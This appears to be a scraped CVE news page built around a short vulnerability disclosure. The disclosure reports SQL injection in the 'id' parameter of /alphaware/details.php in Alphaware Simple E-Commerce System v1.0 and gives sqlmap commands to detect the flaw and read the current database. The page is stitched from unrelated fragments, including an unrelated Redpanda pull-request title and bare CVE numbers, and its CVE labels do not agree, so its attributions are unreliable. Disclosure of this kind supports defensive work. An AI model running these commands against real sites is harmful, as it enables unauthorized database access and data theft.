CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

An issue was discovered in Alphaware - Simple E-Commerce System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /alphaware/details.php?id.

Permalink

Cannot retrieve contributors at this time

**Alphaware - Simple E-Commerce System v1.0 by razormist has SQL injection**

BUG\_Author: Murasaki

Vulnerability File: /alphaware/details.php

Parameter "id" (GET), exists SQL injection vulnerability

sqlmap detect injection vulnerabilities: "sqlmap -u http://ip/alphaware/details.php?id=1"

sqlmap injection result

sqlmap Queries the current database: "sqlmap -u http://ip/alphaware/details.php?id=1 --current-db"

sqlmap injection result

Headline

CVE-2023-26905: bug_report/SQLi-1.md at main · 1MurasaKi/bug_report

CVE: Latest News